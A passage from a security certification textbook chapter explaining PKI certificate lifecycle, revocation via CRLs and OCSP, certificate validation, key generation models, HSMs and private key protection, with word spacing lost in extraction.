Keyregenerationandreplacementisusuallydonetoprotectagainstthesetypesofthreats,althoughastheprocessingpowerofcomputersincreasesandourknowledgeofcryptographyandnewpossiblecryptanalysis-basedattacksexpands,keylifetimesmaydrasticallydecrease.Aswitheverythingwithinthesecurityfield,itisbettertobesafenowthantobesurprisedlaterandsorry.
ExamTip:Goodkeymanagementandproperkeyreplacementintervalsprotectkeysfrombeingcompromisedthroughhumanerror.Choosingalargekeysizemakesabrute-forceattackmoredifficult.
ThePKIadministratorusuallyconfigurestheminimumrequiredkeysizethatusersmustusetohaveakeygeneratedforthefirsttime,andthenforeachrenewal.Inmostapplications,thereisadrop-downlistofpossiblealgorithmstochoosefrom,andpossiblekeysizes.Thekeysizeshouldprovidethenecessarylevelofsecurityforthecurrentenvironment.Thelifetimeofthekeyshouldbelongenoughthatcontinualrenewalwillnotnegativelyaffectproductivity,butshortenoughtoensurethatthekeycannotbesuccessfullycompromised.
TechTip
Centralizedvs.LocalKeyGenerationInmostmodernPKIimplementations,usershavetwokeypairs.Onekeypairisoftengeneratedbyacentralserverandusedforencryptionandkeytransfers.ThisallowsthecorporatePKItoretainacopyoftheencryptionkeypairforrecovery,ifnecessary.Thesecondkeypair,adigitalsignaturekeypair,isusuallygeneratedbytheusertomakesurethatsheistheonlyonewithacopyoftheprivatekey.Nonrepudiationcanbechallengedifthereisanydoubtaboutsomeoneelseobtainingacopyofanindividual’ssignatureprivatekey.Ifthekeypairwascreatedonacentralizedserver,thatcouldweakenthecasethattheindividualwastheonlyonewhohadacopyofherprivatekey.Ifacopyofauser’ssignatureprivatekeyisstoredanywhereotherthaninherpossession,orifthereisapossibilityofsomeoneobtainingtheuser’skey,thentruenonrepudiationcannotbeprovided.
CSRAcertificatesigningrequest(CSR)istheactualrequesttoaCAcontainingapublickeyandtherequisiteinformationneededtogenerateacertificate.TheCSRcontainsalloftheidentifyinginformationthatistobeboundtothekeybythecertificategenerationprocess.
RenewalThecertificateitselfhasitsownlifetime,whichcanbedifferentfromthekeypair’slifetime.Thecertificate’slifetimeisspecifiedbythevaliditydatesinsertedintothedigitalcertificate.Thesearebeginningandendingdatesindicatingthetimeperiodduringwhichthecertificateisvalid.Thecertificatecannotbeusedbeforethestartdate,andoncetheenddateismet,thecertificateisexpiredandanewcertificatewillneedtobeissued.ArenewalprocessisdifferentfromtheregistrationphaseinthattheRA
assumesthattheindividualhasalreadysuccessfullycompletedoneregistrationround.Ifthecertificatehasnotactuallybeenrevoked,theoriginalkeysandcertificatecanbeusedtoprovidethenecessaryauthenticationinformationandproofofidentityfortherenewalphase.Thecertificatemayormaynotneedtochangeduringtherenewal
process;thisusuallydependsonwhytherenewalistakingplace.Ifthecertificatejustexpiredandthekeyswillstillbeusedforthesamepurpose,anewcertificatecanbegeneratedwithnewvaliditydates.If,however,thekeypairfunctionalityneedstobeexpandedorrestricted,newattributesandextensionsmayneedtobeintegratedintothenewcertificate.Thesenewfunctionalitiesmayrequiremoreinformationtobegatheredfromtheindividualrenewingthecertificate,especiallyiftheclasschangesorthenewkeyusesallowformorepowerfulabilities.Thisrenewalprocessisrequiredwhenthecertificatehasfulfilledits
lifetimeanditsendvaliditydatehasbeenmet.
SuspensionWhentheownerofacertificatewishestomarkacertificateasnolongervalidpriortoitsnaturalexpiration,twochoicesexist:revocationandsuspension.Revocation,discussedinthenextsection,isanactionwithapermanentoutcome.Insteadofbeingrevoked,acertificatecanbesuspended,meaningitistemporarilyputonhold.If,forexample,Bobistakinganextendedvacationandwantstoensurethathiscertificatewillnotbecompromisedorusedduringthattime,hecanmakeasuspensionrequesttotheCA.TheCRLwouldlistthiscertificateanditsserialnumber,andinthefieldthatdescribeswhythecertificateisrevoked,itwouldinsteadindicateaholdstate.OnceBobreturnstowork,hecanmakearequesttotheCAtoremovehiscertificatefromthelist.
ExamTip:Acertificatesuspensioncanbeausefulprocesstoolwhileinvestigatingwhetherornotacertificateshouldbeconsideredtobevalid.
Anotherreasontosuspendacertificateisifanadministratorissuspiciousthataprivatekeymighthavebeencompromised.Whiletheissueisunderinvestigation,thecertificatecanbesuspendedtoensurethatitcannotbeused.
Relyingonanexpirationdateonacertificateto“destroy”theutilityofakeywillnotwork.Anewcertificatecanbeissuedwithan“extendeddate.”Toendtheuseofakeyset,anentryinaCRListheonlysurewaytopreventreissuanceandre-datingofacertificate.
Revocation
Acertificatecanberevokedwhenitsvalidityneedstobeendedbeforeitsactualexpirationdateismet,andthiscanoccurformanyreasons:forexample,ausermayhavelostalaptoporasmartcardthatstoredaprivatekey;animpropersoftwareimplementationmayhavebeenuncoveredthatdirectlyaffectedthesecurityofaprivatekey;ausermayhavefallenvictimtoasocialengineeringattackandinadvertentlygivenupaprivatekey;dataheldwithinthecertificatemaynolongerapplytothespecifiedindividual;orperhapsanemployeeleftacompanyandshouldnotbeidentifiedasamemberofanin-housePKIanylonger.Inthelastinstance,thecertificate,whichwasboundtotheuser’skeypair,identifiedtheuserasanemployeeofthecompany,andtheadministratorwouldwanttoensurethatthekeypaircouldnotbeusedinthefuturetovalidatethisperson’saffiliationwiththecompany.Revokingthecertificatedoesthis.
Oncerevoked,acertificatecannotbereinstated.Thisistopreventanunauthorizedreinstatementbysomeonewhohasunauthorizedaccesstothekey(s).Akeypaircanbereinstatedforusebyissuinganewcertificateifatalatertimethekeysarefoundtobesecure.Theoldcertificatewouldstillbevoid,butthenewonewouldbevalid.
Ifanyofthesethingshappens,auser’sprivatekeyhasbeencompromisedorshouldnolongerbemappedtotheowner’sidentity.Adifferentindividualmayhaveaccesstothatuser’sprivatekeyandcoulduseittoimpersonateandauthenticateastheoriginaluser.Iftheimpersonatorusedthekeytodigitallysignamessage,thereceiverwouldverifytheauthenticityofthesenderbyverifyingthesignaturebyusingtheoriginaluser’spublickey,andtheverificationwouldgothroughperfectly—thereceiverwouldbelieveitcamefromthepropersenderandnottheimpersonator.Ifreceiverscouldlookatalistofcertificatesthathadbeenrevokedbeforeverifyingthedigitalsignature,however,theywouldknownottotrustthedigitalsignaturesonthelist.Becauseofissuesassociatedwiththeprivatekeybeingcompromised,revocationispermanentandfinal
—oncerevoked,acertificatecannotbereinstated.Ifreinstatementwasallowedandauserrevokedhiscertificate,thentheunauthorizedholderoftheprivatekeycoulduseittorestorethecertificatevalidity.
ExamTip:Acertificatecannotbeassumedtobevalidwithoutcheckingforrevocationbeforeeachuse.
CertificateRevocationListTheCAprovidesprotectionagainstimpersonationandsimilarfraudbymaintainingacertificaterevocationlist(CRL),alistofserialnumbersofcertificatesthathavebeenrevoked.TheCRLalsocontainsastatementindicatingwhytheindividualcertificateswererevokedandadatewhentherevocationtookplace.ThelistusuallycontainsallcertificatesthathavebeenrevokedwithinthelifetimeoftheCA.Certificatesthathaveexpiredarenotthesameasthosethathavebeenrevoked.Ifacertificatehasexpired,itmeansthatitsendvaliditydatewasreached.TheformatoftheCRLmessageisalsodefinedbyX.509.Thelistissigned,topreventtampering,andcontainsinformationoncertificatesthathavebeenrevokedandthereasonsfortheirrevocation.Theselistscangrowquitelong,andassuch,thereareprovisionsfordatetimestampingthelistandforissuingdeltalists,whichshowchangessincethelastlistwasissued.
TechTip
CRLReasonCodesPertheX.509v2CRLstandard,thefollowingreasonsforrevocationareused:
TheCAistheentitythatisresponsibleforthestatusofthecertificatesitgenerates;itneedstobetoldofarevocation,anditmustprovidethisinformationtoothers.TheCAisresponsibleformaintainingtheCRLandpostingitinapubliclyavailabledirectory.
ExamTip:Thecertificaterevocationlistisanessentialitemtoensureacertificateisstillvalid.CAspostCRLsinpubliclyavailabledirectoriestopermitautomatedcheckingofcertificatesagainstthelistbeforecertificateusebyaclient.AusershouldnevertrustacertificatethathasnotbeencheckedagainsttheappropriateCRL.
Weneedtohavesomesysteminplacetomakesurepeoplecannot
arbitrarilyhaveothers’certificatesrevoked,whetherforrevengeorformaliciouspurposes.Whenarevocationrequestissubmitted,theindividualsubmittingtherequestmustbeauthenticated.Otherwise,thiscouldpermitatypeofdenial-of-serviceattack,inwhichsomeonehasanotherperson’scertificaterevoked.Theauthenticationcaninvolveanagreed-uponpasswordthatwascreatedduringtheregistrationprocess,butauthenticationshouldnotbebasedontheindividualprovingthathehasthecorrespondingprivatekey,becauseitmayhavebeenstolen,andtheCAwouldbeauthenticatinganimposter.TheCRL’sintegrityneedstobeprotectedtoensurethatattackers
cannotmodifydatapertainingtoarevokedcertificationonthelist.Ifthiswereallowedtotakeplace,anyonewhostoleaprivatekeycouldjustdeletethatkeyfromtheCRLandcontinuetousetheprivatekeyfraudulently.Theintegrityofthelistalsoneedstobeprotectedtoensurethatbogusdataisnotaddedtoit.Otherwise,anyonecouldaddanotherperson’scertificatetothelistandeffectivelyrevokethatperson’scertificate.TheonlyentitythatshouldbeabletomodifyanyinformationontheCRListheCA.ThemechanismusedtoprotecttheintegrityofaCRLisadigital
signature.TheCA’srevocationservicecreatesadigitalsignaturefortheCRL,asshowninFigure6.7.Tovalidateacertificate,theuseraccessesthedirectorywheretheCRLisposted,downloadsthelist,andverifiestheCA’sdigitalsignaturetoensurethattheproperauthoritysignedthelistandtoensurethatthelistwasnotmodifiedinanunauthorizedmanner.Theuserthenlooksthroughthelisttodeterminewhethertheserialnumberofthecertificatethatheistryingtovalidateislisted.Iftheserialnumberisonthelist,theprivatekeyshouldnolongerbetrusted,andthepublickeyshouldnolongerbeused.Thiscanbeacumbersomeprocess,soithasbeenautomatedinseveralways,whicharedescribedinthenextsection.
•Figure6.7TheCAdigitallysignstheCRLtoprotectitsintegrity.
Oneconcernishowup-to-datetheCRLis—howoftenisitupdatedanddoesitactuallyreflectallthecertificatescurrentlyrevoked?TheactualfrequencywithwhichthelistisupdateddependsupontheCAanditscertificationpracticesstatement(CPS).Itisimportantthatthelistisupdatedinatimelymannersothatanyoneusingthelisthasthemostcurrentinformation.
CRLDistributionCRLfilescanberequestedbyindividualswhoneedtoverifyandvalidateanewlyreceivedcertificate,orthefilescanbeperiodicallypusheddown
(sent)toallusersparticipatingwithinaspecificPKI.ThismeanstheCRLcanbepulled(downloaded)byindividualuserswhenneededorpusheddowntoalluserswithinthePKIonatimedinterval.TheactualCRLfilecangrowsubstantially,andtransmittingthisfile
andrequiringPKIclientsoftwareoneachworkstationtosaveandmaintainitcanusealotofresources,sothesmallertheCRLis,thebetter.ItisalsopossibletofirstpushdownthefullCRLandsubsequentlypushdownonlydeltaCRLs,whichcontainonlythechangestotheoriginalorbaseCRL.ThiscangreatlyreducetheamountofbandwidthconsumedwhenupdatingCRLs.
TechTip
AuthorityRevocationListsInsomePKIimplementations,aseparaterevocationlistismaintainedforCAkeysthathavebeencompromisedorshouldnolongerbetrusted.Thislistisknownasanauthorityrevocationlist(ARL).IntheeventthataCA’sprivatekeyiscompromisedoracross-certificationiscancelled,therelevantcertificate’sserialnumberisincludedintheARL.AclientcanreviewanARLtomakesuretheCA’spublickeycanstillbetrusted.
InimplementationswheretheCRLsarenotpusheddowntoindividualsystems,theusers’PKIsoftwareneedstoknowwheretolookforthepostedCRLthatrelatestothecertificateitistryingtovalidate.ThecertificatemighthaveanextensionthatpointsthevalidatingusertothenecessaryCRLdistributionpoint.Thenetworkadministratorsetsupthedistributionpoints,andoneormorepointscanexistforaparticularPKI.Thedistributionpointholdsoneormorelistscontainingtheserialnumbersofrevokedcertificates,andtheuser’sPKIsoftwarescansthelist(s)fortheserialnumberofthecertificatetheuserisattemptingtovalidate.Iftheserialnumberisnotpresent,theuserisassuredthatithasnotbeenrevoked.Thisapproachhelpspointuserstotherightresourceandalsoreducestheamountofinformationthatneedstobescannedwhencheckingthatacertificatehasnotbeenrevoked.
OnlineCertificateStatusProtocol(OCSP)OnelastoptionforcheckingdistributedCRLsisanonlineservice.Whenaclientuserneedstovalidateacertificateandensurethatithasnotbeenrevoked,hecancommunicatewithanonlineservicethatwillquerythenecessaryCRLsavailablewithintheenvironment.ThisservicecanquerythelistsfortheclientinsteadofpushingdownthefullCRLtoeachandeverysystem.SoifJoereceivesacertificatefromStacy,hecancontactanonlineserviceandsendtoittheserialnumberlistedinthecertificateStacysent.TheonlineservicewouldquerythenecessaryCRLsandrespondtoJoe,indicatingwhetherornotthatserialnumberwaslistedasbeingrevoked.OneoftheprotocolsusedforonlinerevocationservicesistheOnline
CertificateStatusProtocol(OCSP),arequestandresponseprotocolthatobtainstheserialnumberofthecertificatethatisbeingvalidatedandreviewsrevocationlistsfortheclient.Theprotocolhasaresponderservicethatreportsthestatusofthecertificatebacktotheclient,indicatingwhetherithasbeenrevoked,isvalid,orhasanunknownstatus.Thisprotocolandservicesavestheclientfromhavingtofind,download,andprocesstherightlists.
ExamTip:CertificaterevocationchecksaredoneeitherbyexaminingtheCRLorbyusingOCSPtoseeifacertificatehasbeenrevoked.
KeyDestructionKeypairsandcertificateshavesetlifetimes,meaningthattheywillexpireatsomespecifiedtime.Itisimportantthatthecertificatesandkeysareproperlydestroyedwhenthattimecomes,whereverthekeysarestored(onusers’workstations,centralizedkeyservers,USBtokendevices,smartcards,andsoon).
TechTip
HistoricalRetentionofCertificatesNotethatinmodernPKIs,encryptionkeypairsusuallymustberetainedlongaftertheyexpiresothatuserscandecryptinformationthatwasencryptedwiththeoldkeys.Forexample,ifBobencryptsadocumentusinghiscurrentkeyandthekeysareupdatedthreemonthslater,Bob’ssoftwaremustmaintainacopyoftheoldkeysohecanstilldecryptthedocument.InthePKIworld,thisissueisreferredtoaskeyhistorymaintenance.
Thegoalistomakesurethatnoonecangainaccesstoakeyafteritslifetimehasendedandusethatkeyformaliciouspurposes.Anattackermightusethekeytodigitallysignorencryptamessagewiththehopesoftrickingsomeoneelseabouthisidentity(thiswouldbeanexampleofaman-in-themiddleattack).Also,iftheattackerisperformingsometypeofbrute-forceattackonyourcryptosystem,tryingtofigureoutspecifickeysthatwereusedforencryptionprocesses,obtaininganoldkeycouldgivehimmoreinsightintohowyourcryptosystemgenerateskeys.Thelessinformationyousupplytopotentialhackers,thebetter.
CertificateRepositoriesOncetherequestor’sidentityhasbeenproven,acertificateisregisteredwiththepublicsideofthekeypairprovidedbytherequestor.PublickeysmustbeavailabletoanybodywhorequiresthemtocommunicatewithinaPKIenvironment.Thesekeys,andtheircorrespondingcertificates,areusuallyheldinapubliclyavailablerepository.Certificaterepositoryisageneraltermthatdescribesacentralizeddirectorythatcanbeaccessedbyasubsetofindividuals.ThedirectoriesareusuallyLightweightDirectoryAccessProtocol(LDAP)–compliant,meaningthattheycanbeaccessedandsearchedviaanLDAPqueryfromanLDAPclient.Whenanindividualinitializescommunicationwithanother,thesender
cansendhercertificateandpublickeytothereceiver,whichwillallowthe
receivertocommunicatewiththesenderusingencryptionordigitalsignatures(orboth)withoutneedingtotrackdownthenecessarypublickeyinacertificaterepository.Thisisequivalenttothesendersaying,“Ifyouwouldliketoencryptanyfuturemessagesyousendtome,orifyouwouldliketheabilitytoverifymydigitalsignature,herearethenecessarycomponents.”Butifapersonwantstoencryptthefirstmessagesenttothereceiver,thesenderneedstofindthereceiver’spublickeyinacertificaterepository.
CrossCheckCertificatesandKeysCertificatesareastandardizedmethodofexchangingasymmetrickeyinformation.Tounderstandtheneedforcertificates,youshouldfirstbeabletoanswerthequestions:
WhatdoIneedapublickeyfor?
HowcanIgetsomeone’spublickey,andhowdoIknowitistheirs?
Forarefresheronhowpublicandprivatekeyscomeintoplaywithencryptionanddigitalsignatures,refertoChapter5.
Acertificaterepositoryisaholdingplaceforindividuals’certificatesandpublickeysthatareparticipatinginaparticularPKIenvironment.ThesecurityrequirementsforrepositoriesthemselvesarenotashighasthoseneededforactualCAsandfortheequipmentandsoftwareusedtocarryoutCAfunctions.SinceeachcertificateisdigitallysignedbytheCA,ifacertificatestoredinthecertificaterepositoryismodified,therecipientwillbeabletodetectthischangeandknownottoacceptthecertificateasvalid.
TrustandCertificateVerificationWeneedtouseaPKIifwedonotautomaticallytrustindividualswedonotknow.Securityisaboutbeingsuspiciousandbeingsafe,soweneeda
thirdpartythatwedotrusttovouchfortheotherindividualbeforeconfidencecanbeinstilledandsensitivecommunicationcantakeplace.ButwhatdoesitmeanthatwetrustaCA,andhowcanweusethistoouradvantage?WhenauserchoosestotrustaCA,shewilldownloadthatCA’sdigital
certificateandpublickey,whichwillbestoredonherlocalcomputer.MostbrowsershavealistofCAsconfiguredtobetrustedbydefault,sowhenauserinstallsanewwebbrowser,severalofthemostwell-knownandmosttrustedCAswillbetrustedwithoutanychangeofsettings.AnexampleofthislistingisshowninFigure6.8.
•Figure6.8BrowsershavealonglistofCAsconfiguredtobetrustedbydefault.
IntheMicrosoftCAPIenvironment,theusercanaddandremoveCAsfromthislistasneeded.Inproductionenvironmentsthatrequireahigherdegreeofprotection,thislistwillbepruned,andpossiblytheonlyCAslistedwillbethecompany’sinternalCAs.Thisensuresthatdigitallysignedsoftwarewillbeautomaticallyinstalledonlyifitwassignedbythecompany’sCA.Otherproducts,suchasEntrust,usecentrallycontrolledpoliciestodeterminewhichCAsaretobetrusted,insteadofexpectingtheusertomakethesecriticaldecisions.
TechTip
DistinguishedNamesAdistinguishednameisalabelthatfollowstheX.500standard.Thisstandarddefinesanamingconventionthatcanbeemployedsothateachsubjectwithinanorganizationhasauniquename.Anexampleis{Country=US,Organization=RealSecure,OrganizationalUnit=R&D,Location=Washington}.CAsusedistinguishednamestoidentifytheownersofspecificcertificates.
Anumberofstepsareinvolvedincheckingthevalidityofamessage.Suppose,forexample,thatMaynardreceivesadigitallysignedmessagefromJoyce,whohedoesnotknowortrust.Joycehasalsoincludedherdigitalcertificatewithhermessage,whichhasherpublickeyembeddedwithinit.BeforeMaynardcanbesureoftheauthenticityofthismessage,hehassomeworktodo.ThestepsareillustratedinFigure6.9.
•Figure6.9Stepsforverifyingtheauthenticityandintegrityofacertificate
First,MaynardseeswhichCAsignedJoyce’scertificateandcomparesittothelistofCAshehasconfiguredwithinhiscomputer.HetruststheCAsinhislistandnoothers.(IfthecertificatewassignedbyaCAthathedoesnothaveinthelist,hewouldnotacceptthecertificateasbeingvalid,andthushecouldnotbesurethatthismessagewasactuallysentfromJoyceorthattheattachedkeywasactuallyherpublickey.)
Becausecertificatesproducechainsoftrust,havinganunnecessarycertificateinyourcertificatestorecouldleadtotrustproblems.Bestpracticesindicatethatyoushouldunderstandthecertificatesinyourstore,andtheneedforeach.Whenindoubt,removeit.Ifitisneeded,youcanadditbacklater.
MaynardseesthattheCAthatsignedJoyce’scertificateisindeedinhislistoftrustedCAs,sohenowneedstoverifythatthecertificatehasnotbeenaltered.UsingtheCA’spublickeyandthedigestofthecertificate,Maynardcanverifytheintegrityofthecertificate.ThenMaynardcanbeassuredthatthisCAdidactuallycreatethecertificate,sohecannowtrusttheoriginofJoyce’scertificate.Theuseofdigitalsignaturesallowscertificatestobesavedinpublicdirectorieswithouttheconcernofthembeingaccidentallyorintentionallyaltered.Ifauserextractsacertificatefromarepositoryandcreatesamessagedigestvaluethatdoesnotmatchthedigitalsignatureembeddedwithinthecertificateitself,thatuserwillknowthatthecertificatehasbeenmodifiedbysomeoneotherthantheCA,andhewillknownottoacceptthevalidityofthecorrespondingpublickey.Similarly,anattackercouldnotcreateanewmessagedigest,encryptit,andembeditwithinthecertificatebecausehewouldnothaveaccesstotheCA’sprivatekey.
ButMaynardisnotdoneyet.HeneedstobesurethattheissuingCAhasnotrevokedthiscertificate.Thecertificatealsohasstartandstopdates,indicatingatimeduringwhichthecertificateisvalid.Ifthestartdatehasn’thappenedyetorthestopdatehasbeenpassed,thecertificateisnotvalid.Maynardreviewsthesedatestomakesurethecertificateisstilldeemedvalid.AnotherstepMaynardmaygothroughistocheckwhetherthis
certificatehasbeenrevokedforanyreason.Todoso,hewillrefertothecertificaterevocationlist(CRL)toseeifJoyce’scertificateislisted.HecouldchecktheCRLdirectlywiththeCAthatissuedthecertificateorviaaspecializedonlineservicethatsupportstheOnlineCertificateStatusProtocol(OCSP).(Certificaterevocationandlistdistributionwereexplainedinthe“CertificateLifecycles”section,earlierinthischapter.)
TechTip
ValidatingaCertificateThefollowingstepsarerequiredforvalidatingacertificate:
1.ComparetheCAthatdigitallysignedthecertificatetoalistofCAsthathavealreadybeenloadedintothereceiver’scomputer.
2.Calculateamessagedigestforthecertificate.3.UsetheCA’spublickeytodecryptthedigitalsignatureandrecoverwhatisclaimedtobe
theoriginalmessagedigestembeddedwithinthecertificate(validatingthedigitalsignature).
4.Comparethetworesultingmessagedigestvaluestoensuretheintegrityofthecertificate.5.Reviewtheidentificationinformationwithinthecertificate,suchasthee-mailaddress.6.Reviewthevaliditydates.7.Checkarevocationlisttoseeifthecertificatehasbeenrevoked.
MaynardnowtruststhatthiscertificateislegitimateandthatitbelongstoJoyce.Nowwhatdoesheneedtodo?ThecertificateholdsJoyce’spublickey,whichheneedstovalidatethedigitalsignaturesheappendedtohermessage,soMaynardextractsJoyce’spublickeyfromher
certificate,runshermessagethroughahashingalgorithm,andcalculatesamessagedigestvalueofX.HethenusesJoyce’spublickeytodecryptherdigitalsignature(rememberthatadigitalsignatureisjustamessagedigestencryptedwithaprivatekey).ThisdecryptionprocessprovideshimwithanothermessagedigestofvalueY.MaynardcomparesvaluesXandY,andiftheyarethesame,heisassuredthatthemessagehasnotbeenmodifiedduringtransmission.Thushehasconfidenceintheintegrityofthemessage.ButhowdoesMaynardknowthatthemessageactuallycamefromJoyce?Becausehecandecryptthedigitalsignatureusingherpublickey,whichindicatesthatonlytheassociatedprivatekeycouldhavebeenused.Thereisaminisculeriskthatsomeonecouldcreateanidenticalkeypair,butgiventheenormouskeyspaceforpublickeys,thisisimpractical.Thepublickeycanonlydecryptsomethingthatwasencryptedwiththerelatedprivatekey,andonlytheowneroftheprivatekeyissupposedtohaveaccesstoit.MaynardcanbesurethatthismessagecamefromJoyce.Afterallofthishereadshermessage,whichsays,“Hi.Howareyou?”
Allofthatworkjustforthismessage?Maynard’sbloodpressurewouldsurelygothroughtheroofifhehadtodoallofthisworkonlytoendupwithashortandnotveryusefulmessage.Fortunately,allofthisPKIworkisperformedwithoutuserinterventionandhappensbehindthescenes.Maynarddidn’thavetoexertanyenergy.Hesimplyreplies,“Fine.Howareyou?”
CentralizedandDecentralizedInfrastructuresKeysusedforauthenticationandencryptionwithinaPKIenvironmentcanbegeneratedinacentralizedordecentralizedmanner.Inadecentralizedapproach,softwareonindividualcomputersgeneratesandstorescryptographickeyslocaltothesystemsthemselves.Inacentralizedinfrastructure,thekeysaregeneratedandstoredonacentralserver,andthekeysaretransmittedtotheindividualsystemsasneeded.Youmightchooseonetypeovertheotherforseveralreasons.Ifacompanyusesanasymmetricalgorithmthatisresource-intensiveto
generatethepublic/privatekeypair,andiflarge(andresource-intensive)keysizesareneeded,thentheindividualcomputersmaynothavethenecessaryprocessingpowertoproducethekeysinanacceptablefashion.Inthissituation,thecompanycanchooseacentralizedapproachinwhichaveryhigh-endserverwithpowerfulprocessingabilitiesisused,probablyalongwithahardware-basedrandomnumbergenerator.Centralkeygenerationandstorageoffersotherbenefitsaswell.For
example,itismucheasiertobackupthekeysandimplementkeyrecoveryprocedureswithcentralstoragethanwithadecentralizedapproach.Implementingakeyrecoveryprocedureoneachandeverycomputerholdingoneormorekeypairsisdifficult,andmanyapplicationsthatgeneratetheirownkeypairsdonotusuallyinterfacewellwithacentralizedarchivesystem.Thismeansthatifacompanychoosestoallowitsindividualuserstocreateandmaintaintheirownkeypairsontheirseparateworkstations,norealkeyrecoveryprocedurecanbeputinplace.Thisputsthecompanyatrisk.Ifanemployeeleavestheorganizationorisunavailableforonereasonoranother,thecompanymaynotbeabletoaccessitsownbusinessinformationthatwasencryptedbythatemployee.Soacentralizedapproachseemslikethebestapproach,right?Well,the
centralizedmethodhassomedrawbackstoconsider,too.Securekeydistributionisatrickyevent.Thiscanbemoredifficultthanitsounds.Atechnologyneedstobeemployedthatwillsendthekeysinanencryptedmanner,ensurethekeys’integrity,andmakesurethatonlytheintendeduserisreceivingthekey.Also,theserverthatcentrallystoresthekeysneedstobehighly
availableandisapotentialsinglepointoffailure,sosometypeoffaulttoleranceorredundancymechanismmayneedtobeputintoplace.Ifthatoneservergoesdown,userscouldnotaccesstheirkeys,whichmightpreventthemfromproperlyauthenticatingtothenetwork,resources,andapplications.Also,sinceallthekeysareinoneplace,theserverisaprimetargetforanattacker—ifthecentralkeyserveriscompromised,thewholeenvironmentiscompromised.Oneotherissuepertainstohowthekeyswillactuallybeused.Ifa
public/privatekeypairisbeinggeneratedfordigitalsignatures,andifthecompanywantstoensurethatitcanbeusedtoprovidetrueauthenticityandnonrepudiation,thekeysshouldnotbegeneratedatacentralizedserver.Thiswouldintroducedoubtthatonlytheonepersonhadaccesstoaspecificprivatekey.Itisbettertogenerateend-userkeysonalocalmachinetoeliminatedoubtaboutwhodidtheworkand“owns”thekeys.Ifacompanyusessmartcardstoholdusers’privatekeys,eachprivate
keyoftenhastobegeneratedonthecarditselfandcannotbecopiedforarchivingpurposes.Thisisadisadvantageofthecentralizedapproach.Inaddition,sometypesofapplicationshavebeendevelopedtocreatetheirownpublic/privatekeypairsanddonotallowotherkeystobeimportedandused.Thismeansthekeyswouldhavetobecreatedlocallybytheseapplications,andkeysfromacentralservercouldnotbeused.Thesearejustsomeoftheconsiderationsthatneedtobeevaluatedbeforeanydecisionismadeandimplementationbegins.
HardwareSecurityModulesPKIscanbeconstructedinsoftwarewithoutspecialcryptographichardware,andthisisperfectlysuitableformanyenvironments.Butsoftwarecanbevulnerabletoviruses,hackers,andhacking.Ifacompanyrequiresahigherlevelofprotectionthanapurelysoftware-basedsolutioncanprovide,severalhardware-basedsolutionsareavailable.Ahardwaresecuritymodule(HSM)isaphysicaldevicethatsafeguardscryptographickeys.HSMsenableahigherlevelofsecurityfortheuseofkeys,includinggenerationandauthentication.Inmostsituations,HSMsolutionsareusedonlyforthemostcriticaland
sensitivekeys,whicharetherootkeyandpossiblytheintermediateCAprivatekeys.Ifthosekeysarecompromised,thewholesecurityofthePKIisgravelythreatened.IfapersonobtainedarootCAprivatekey,shecoulddigitallysignanycertificate,andthatcertificatewouldbequicklyacceptedbyallentitieswithintheenvironment.Suchanattackermightbeabletocreateacertificatethathasextremelyhighprivileges,perhapsallowingher
tomodifybankaccountinformationinafinancialinstitution,andnoalertsorwarningswouldbeinitiatedbecausetheultimateCA,therootCA,signedit.
TechTip
StoringCriticalKeysHSMstakemanydifferentforms,includingembeddedcards,network-attacheddevices,andevenUSBflashdrives.HSMsassistintheuseofcryptographickeysacrossthelifecycle.Theycanprovidededicatedsupportforcentralizedlifecyclemanagement,fromgenerationtodistribution,storage,termination,archiving,andrecordkeeping.HSMscanincreasetheefficiencyofcryptographicoperationsandassistincomplianceefforts.CommonusesincludeuseinPCIDSSsolutions,DNSSEC,signingoperationsincludingcertificates,code,documents,ande-mail,andlarge-scaledataencryptionefforts.
PrivateKeyProtectionAlthoughaPKIimplementationcanbecomplex,withmanydifferentcomponentsandoptions,acriticalconceptcommontoallPKIsmustbeunderstoodandenforced:theprivatekeyneedstostayprivate.Adigitalsignatureiscreatedsolelyforthepurposeofprovingwhosentaparticularmessagebyusingaprivatekey.Thisrestsontheassumptionthatonlyonepersonhasaccesstothisprivatekey.Ifanimposterobtainsauser’sprivatekey,authenticityandnonrepudiationcannolongerbeclaimedorproven.Whenaprivatekeyisgeneratedforthefirsttime,itmustbestored
somewhereforfutureuse.Thisstorageareaisreferredtoasakeystore,anditisusuallycreatedbytheapplicationregisteringforacertificate,suchasawebbrowser,smartcardsoftware,orotherapplication.Inmostimplementations,theapplicationwillprompttheuserforapassword,whichwillbeusedtocreateanencryptionkeythatprotectsthekeystore.So,forexample,ifCherylusedherwebbrowsertoregisterforacertificate,herprivatekeywouldbegeneratedandstoredinthekeystore.Cherylwouldthenbepromptedforapassword,whichthesoftwarewould
usetocreateakeythatwillencryptthekeystore.WhenCherylneedstoaccessthisprivatekeylaterthatday,shewillbepromptedforthesamepassword,whichwilldecryptthekeystoreandallowheraccesstoherprivatekey.Unfortunately,manyapplicationsdonotrequirethatastrongpassword
becreatedtoprotectthekeystore,andinsomeimplementationstheusercanchoosenottoprovideapasswordatall.Theuserstillhasaprivatekeyavailable,anditisboundtotheuser’sidentity,sowhyisapasswordevennecessary?If,forexample,Cheryldecidednottouseapassword,andanotherpersonsatdownathercomputer,hecoulduseherwebbrowserandherprivatekeyanddigitallysignamessagethatcontainsanastyvirus.IfCheryl’scoworkerCliffreceivedthismessage,hewouldthinkitcamefromCheryl,openthemessage,anddownloadthevirus.Themoraltothisstoryisthatusersshouldberequiredtoprovidesometypeofauthenticationinformation(password,smartcard,PIN,orthelike)beforebeingabletouseprivatekeys.Otherwise,thekeyscouldbeusedbyotherindividualsorimposters,andauthenticationandnonrepudiationwouldbeofnouse.BecauseaprivatekeyisacrucialcomponentofanyPKI
implementation,thekeyitselfshouldcontainthenecessarycharacteristicsandbeprotectedateachstageofitslife.Thefollowinglistsumsupthecharacteristicsandrequirementsofproperprivatekeyuse:
Thesecurityassociatedwiththeuseofpublickeycryptographyrevolvesaroundthesecurityoftheprivatekey.Nonrepudiationdependsupontheprinciplethattheprivatekeyisonlyaccessibletotheholderofthekey.Ifanotherpersonhasaccesstotheprivatekey,theycanimpersonatetheproperkeyholder.
Thekeysizeshouldprovidethenecessarylevelofprotectionfortheenvironment.
Thelifetimeofthekeyshouldcorrespondwithhowoftenitisused
andthesensitivityofthedataitisprotecting.
Thekeyshouldbechangedattheendofitslifetimeandnotusedpastitsallowedlifetime.
Whereappropriate,thekeyshouldbeproperlydestroyedattheendofitslifetime.
Thekeyshouldneverbeexposedincleartext.
Nocopiesoftheprivatekeyshouldbemadeifitisbeingusedfordigitalsignatures.
Thekeyshouldnotbeshared.
